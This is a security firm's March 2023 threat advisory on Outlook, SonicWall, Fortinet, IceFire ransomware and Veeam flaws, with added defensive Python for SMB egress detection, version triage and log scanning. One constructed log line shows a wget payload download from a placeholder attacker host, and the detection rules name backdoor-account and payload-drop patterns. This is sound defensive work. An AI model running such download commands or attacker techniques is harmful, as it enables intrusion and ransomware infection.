Monthly Advisory • 10 MIN READ

March Threat Advisory – Top 5

by Eleanor Barlow • Mar 2023

SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of March 2023.

Microsoft Released March 2023 Patch Tuesday for 83 Flaws, Including 2 Zero-Days.

Threat Reference: Global

Risks: Privilege Elevation, Remote Code Execution and Security Feature Bypass

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its March 2023 Patch Tuesday, fixing 83 vulnerabilities, including 2 zero-days and 9 rated critical. The fixes cover privilege elevation, security feature bypass, remote code execution, denial of service and information disclosure flaws, as well as Chromium vulnerabilities.

One of the zero-days, a Microsoft Outlook elevation of privilege vulnerability, allows a specially crafted email to force the victim’s endpoint to connect to a remote URL and transmit the Windows account’s Net-NTLMv2 hash. Exploitation requires no user interaction.

Recommendations

• It is recommended to ensure the patch is successfully deployed to 100% of endpoints.

• Keep applications and operating systems running at the current released patch level.

• Deploy Endpoint Detection & Response (EDR) tools to detect the latest malware and suspicious activity on endpoints.
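
The network-visible symptom of the Outlook flaw described above is an endpoint answering an authentication challenge from a server outside the organisation. The following is an added example, not code from SecurityHQ or Microsoft: it scans constructed flow records and flags SMB (TCP 445) connections from internal hosts to non-internal destinations, then groups them by destination so a single collecting server stands out. It assumes the leaked hash travels over SMB, which the advisory does not state but is the usual transport for Net-NTLMv2; the record format and all addresses are constructed.

```python
import ipaddress
from typing import Dict, List, NamedTuple

# Added example, not part of the SecurityHQ advisory. Flow records use a constructed
# "<timestamp> <src_ip> <dst_ip> <dst_port> <proto>" format standing in for whatever
# the perimeter firewall or NetFlow collector actually exports.
CONSTRUCTED_FLOWS = [
    "2023-03-15T09:12:01Z 10.1.5.23 10.1.0.10 445 tcp",      # internal file server: expected
    "2023-03-15T09:12:05Z 10.1.5.23 203.0.113.7 445 tcp",    # SMB to an internet host: suspicious
    "2023-03-15T09:12:09Z 10.1.5.23 198.51.100.20 443 tcp",  # ordinary HTTPS: ignored
    "2023-03-15T09:13:44Z 10.1.7.8 203.0.113.7 445 tcp",     # second host, same destination
    "2023-03-15T09:14:02Z 10.1.5.23 172.16.40.2 445 tcp",    # internal: expected
]

# Only RFC 1918 space and loopback count as "internal" here. Documentation ranges such
# as 203.0.113.0/24 are deliberately treated as external because the sample uses them
# to stand in for internet hosts (ipaddress's is_private would classify them as private).
INTERNAL_NETWORKS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]
SMB_PORT = 445


class Flow(NamedTuple):
    ts: str
    src: str
    dst: str
    dport: int
    proto: str


def is_internal(ip: str) -> bool:
    """True when the address falls inside one of the internal ranges above."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETWORKS)


def parse_flow(line: str) -> Flow:
    """Split one constructed flow record into typed fields."""
    ts, src, dst, dport, proto = line.split()
    return Flow(ts, src, dst, int(dport), proto.lower())


def find_external_smb(lines: List[str]) -> List[Flow]:
    """Return every TCP/445 flow whose destination is outside the internal ranges.

    An endpoint that suddenly speaks SMB to an internet host is the symptom of the
    credential leak described in the advisory: the client is answering an NTLM
    challenge from a server it should never have been talking to.
    """
    hits = []
    for line in lines:
        flow = parse_flow(line)
        if flow.proto == "tcp" and flow.dport == SMB_PORT and not is_internal(flow.dst):
            hits.append(flow)
    return hits


def victims_by_destination(lines: List[str]) -> Dict[str, List[str]]:
    """Group flagged flows by external server, so one host collecting hashes from
    several endpoints shows up as a single cluster rather than scattered alerts."""
    grouped: Dict[str, List[str]] = {}
    for flow in find_external_smb(lines):
        grouped.setdefault(flow.dst, []).append(flow.src)
    return grouped


if __name__ == "__main__":
    for dst, srcs in victims_by_destination(CONSTRUCTED_FLOWS).items():
        print(f"external SMB destination {dst}: {len(srcs)} internal host(s) -> {sorted(srcs)}")
```

In a real deployment the same check belongs on the egress firewall as a block rule as much as in the SIEM as a detection; the script only shows which hosts have already reached out, which is the list the incident responders need first.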

China-Linked Actor (UNC4540) Deploys Malware in SonicWall SMA 100 Series.

Threat Reference: Global

Risks: Malware/Backdoor

Advisory Type: Threats

Priority: Standard

Security researchers have discovered a China-linked campaign deploying malware on SonicWall SMA devices.

Affected Product: SonicWall SMA100

Tactics Techniques & Procedures (TTPs):

  • The malware uses TinyShell and bash scripts to steal hashed credentials of logged-in users by executing SQL commands.
  • Stolen credentials are copied to an attacker-controlled file and cracked offline.
  • TinyShell creates a reverse shell for remote access.
  • The legitimate SonicWall binary firebase is patched to keep the malware stable during device shutdown.
  • Persistence is achieved through the firmware update process and backup bash scripts.
  • A bash script run during firmware updates re-adds the malware and a backdoor user named acme for long-term access.

Recommendation:

  • Monitor network traffic 24×7 for suspicious outbound connections and for the TTPs described above.
  • Having a backup plan in place and performing regular backups can help minimise the impact of a malware attack.
  • Segmenting the network into different subnets can help limit the spread of malware.

Permanent Fix: It is recommended to upgrade SMA100 to version 10.2.1.7 or higher.

Fortinet Released Patches to Fix Critical Vulnerabilities Impacting FortiOS & FortiProxy.

Threat Reference: Global

Risks: Buffer Underflow

Advisory Type: Patches/Updates

Priority: Standard

Fortinet has released patches to fix a buffer underflow vulnerability in the FortiOS and FortiProxy administrative interface. A remote attacker could exploit it via specially crafted requests to execute arbitrary code on the device or cause a denial of service of the GUI.

Critical – Heap buffer underflow in administrative interface.

The affected products are:

  • FortiOS version 7.2.0 through 7.2.3
  • FortiOS version 7.0.0 through 7.0.9
  • FortiOS version 6.4.0 through 6.4.11
  • FortiOS version 6.2.0 through 6.2.12
  • FortiOS 6.0, all versions
  • FortiProxy version 7.2.0 through 7.2.2
  • FortiProxy version 7.0.0 through 7.0.8
  • FortiProxy version 2.0.0 through 2.0.11
  • FortiProxy 1.2, all versions
  • FortiProxy 1.1, all versions

Recommendation: It is recommended to update all the affected products to the latest available patch version.
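
Deciding which devices need the patch is mostly a matter of comparing running versions against the ranges listed above, and the "all versions" branches are the part that a naive string comparison gets wrong. The following added example, which is not Fortinet's or SecurityHQ's code, encodes the affected ranges from this advisory and triages a constructed inventory; the device names and versions in the inventory are made up for illustration, and the parser only handles dotted-numeric versions with an optional build suffix.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Added example, not Fortinet's or SecurityHQ's code. The ranges are transcribed from
# the advisory text above; the inventory further down is constructed for illustration.
Version = Tuple[int, ...]


class AffectedRange(NamedTuple):
    product: str
    low: Version             # inclusive lower bound
    high: Optional[Version]  # inclusive upper bound; None means "all versions" of the `low` branch


def parse_version(text: str) -> Version:
    """Turn '7.2.3' (or 'v7.2.3,build1262') into a comparable tuple of ints."""
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def _r(product: str, low: str, high: Optional[str]) -> AffectedRange:
    return AffectedRange(product, parse_version(low), parse_version(high) if high else None)


AFFECTED: List[AffectedRange] = [
    _r("FortiOS", "7.2.0", "7.2.3"),
    _r("FortiOS", "7.0.0", "7.0.9"),
    _r("FortiOS", "6.4.0", "6.4.11"),
    _r("FortiOS", "6.2.0", "6.2.12"),
    _r("FortiOS", "6.0", None),        # FortiOS 6.0, all versions
    _r("FortiProxy", "7.2.0", "7.2.2"),
    _r("FortiProxy", "7.0.0", "7.0.8"),
    _r("FortiProxy", "2.0.0", "2.0.11"),
    _r("FortiProxy", "1.2", None),     # FortiProxy 1.2, all versions
    _r("FortiProxy", "1.1", None),     # FortiProxy 1.1, all versions
]


def in_range(rng: AffectedRange, product: str, version: Version) -> bool:
    if product != rng.product:
        return False
    if rng.high is None:
        # "all versions" of a branch: match on the branch prefix, e.g. (6, 0)
        return version[: len(rng.low)] == rng.low
    # tuple comparison is lexicographic, so (7, 2, 3) <= (7, 2, 3) and (7, 2, 4) > (7, 2, 3)
    return rng.low <= version <= rng.high


def is_affected(product: str, version_text: str) -> bool:
    version = parse_version(version_text)
    return any(in_range(rng, product, version) for rng in AFFECTED)


# Constructed inventory: (device name, product, running version)
INVENTORY = [
    ("fw-edge-01", "FortiOS", "7.2.3"),
    ("fw-edge-02", "FortiOS", "7.2.4"),
    ("proxy-01", "FortiProxy", "2.0.11"),
    ("fw-lab", "FortiOS", "6.0.15"),
    ("proxy-02", "FortiProxy", "7.0.9"),
]


def triage(inventory) -> List[str]:
    """Names of devices whose running version falls inside an affected range."""
    return [name for name, product, ver in inventory if is_affected(product, ver)]


if __name__ == "__main__":
    for name, product, ver in INVENTORY:
        status = "AFFECTED - patch" if is_affected(product, ver) else "not in advisory range"
        print(f"{name:12} {product:11} {ver:8} {status}")
```

A version outside every listed range is reported only as "not in advisory range"; whether it is actually the fixed release is something to confirm against Fortinet's own PSIRT notice, which is why the recommendation above says to move to the latest available patch rather than to a specific number.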

IceFire Ransomware New Variant Targets Linux and Windows Systems.

Threat Reference: Global

Risks: Ransomware

Advisory Type: Threats

Priority: Standard

Security researchers discovered a new variant of IceFire ransomware that is targeting Linux Systems by exploiting a vulnerability affecting IBM Aspera Faspex file-sharing software. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code due to a YAML deserialization flaw.

After successful exploitation of the targeted system, the attacker uses wget to download two payloads and save them under the ‘/opt/aspera/faspex’ path. The IceFire ransomware payloads are then executed: they encrypt the system’s files and append the ‘.ifire’ extension to each filename. After encryption completes, the binaries and the payload are removed from the system.

Recommendations:

• Deploy Endpoint Detection & Response (EDR) tools to detect latest malwares and suspicious activities on endpoints.

• Ensure the IT infrastructure, and especially the WAF, is monitored 24×7 for malicious activity in order to detect and prevent such exploits.

• It is recommended to patch and update systems regularly.
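
Both the SonicWall advisory above (the backdoor user named acme) and this IceFire advisory (wget dropping payloads into /opt/aspera/faspex, files renamed with the .ifire extension) give indicators that are visible in ordinary host logs. The following is an added example, not SecurityHQ's tooling, of turning those stated TTPs into simple detection rules and running them over constructed log lines: the lines imitate syslog/auditd output and a passwd entry, the rule names are my own, and "ATTACKER-HOST-PLACEHOLDER" stands in for a download host the advisory does not name.

```python
import re
from typing import Dict, List, NamedTuple

# Added example, not SecurityHQ's tooling. The log lines are constructed to resemble
# syslog/auditd output and a /etc/passwd entry; ATTACKER-HOST-PLACEHOLDER stands in
# for a download host that the advisory does not name.
CONSTRUCTED_LOG = [
    "2023-03-08T02:14:07Z sma100 useradd[2210]: new user: name=acme, UID=0, GID=0, home=/tmp",
    "acme:x:0:0::/tmp:/bin/bash",
    "2023-03-08T02:15:12Z sma100 sshd[2281]: Accepted password for admin from 10.20.30.5",
    "2023-03-09T11:02:33Z faspex01 sh[4412]: wget -q http://ATTACKER-HOST-PLACEHOLDER/p1 -O /opt/aspera/faspex/p1",
    "2023-03-09T11:03:01Z faspex01 audit[4420]: rename /srv/share/q1-report.xlsx /srv/share/q1-report.xlsx.ifire",
    "2023-03-09T11:05:44Z faspex01 cron[881]: (root) CMD (run-parts /etc/cron.hourly)",
]


class Rule(NamedTuple):
    name: str
    advisory: str
    pattern: "re.Pattern[str]"
    why: str


# Each rule is tied to a concrete TTP stated in the advisories above.
RULES = [
    Rule("sonicwall-backdoor-user", "UNC4540 / SonicWall SMA",
         re.compile(r"^acme:|\buseradd\b.*\bacme\b"),
         "backdoor account 'acme' added for long-term access"),
    Rule("icefire-payload-download", "IceFire",
         re.compile(r"\bwget\b.*/opt/aspera/faspex"),
         "wget writing payloads into the Aspera Faspex install path"),
    Rule("icefire-encrypted-file", "IceFire",
         re.compile(r"\.ifire\b"),
         "file renamed with the .ifire ransomware extension"),
]


class Hit(NamedTuple):
    rule: str
    advisory: str
    line: str


def scan(lines: List[str], rules: List[Rule] = RULES) -> List[Hit]:
    """Return one Hit per (rule, line) pair where the rule's pattern matches."""
    hits = []
    for line in lines:
        for rule in rules:
            if rule.pattern.search(line):
                hits.append(Hit(rule.name, rule.advisory, line))
    return hits


def summarize(lines: List[str]) -> Dict[str, int]:
    """Count matches per rule; any non-zero count is the trigger for an investigation."""
    counts: Dict[str, int] = {}
    for hit in scan(lines):
        counts[hit.rule] = counts.get(hit.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in scan(CONSTRUCTED_LOG):
        print(f"[{hit.advisory}] {hit.rule}: {hit.line}")
    print(summarize(CONSTRUCTED_LOG))
```

The .ifire rule is the noisiest of the three because it fires once per encrypted file, which is useful: a sudden burst of matches on one host is the point at which isolating that host matters more than finishing the investigation.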

Veeam Fixed High-Severity Vulnerability Impacting Veeam Backup & Replication.

Threat Reference: Global

Risks: Unauthorized Access

Advisory Type: Updates/Patches

Priority: Standard

Veeam fixed a high-severity vulnerability affecting all versions of the Backup & Replication service. Successful exploitation allows an attacker to obtain the encrypted credentials stored in the database and use them to access the backup infrastructure.

Recommendations:

It is recommended to update affected products to the latest version available.

Having conducted incident response investigations across a wide range of industries, SecurityHQ are best placed to work with businesses large and small, and across numerous technical environments, to reduce the impact of a cyber security incident. For more information on these threats, speak to an expert. If you suspect a security incident, you can report it to SecurityHQ.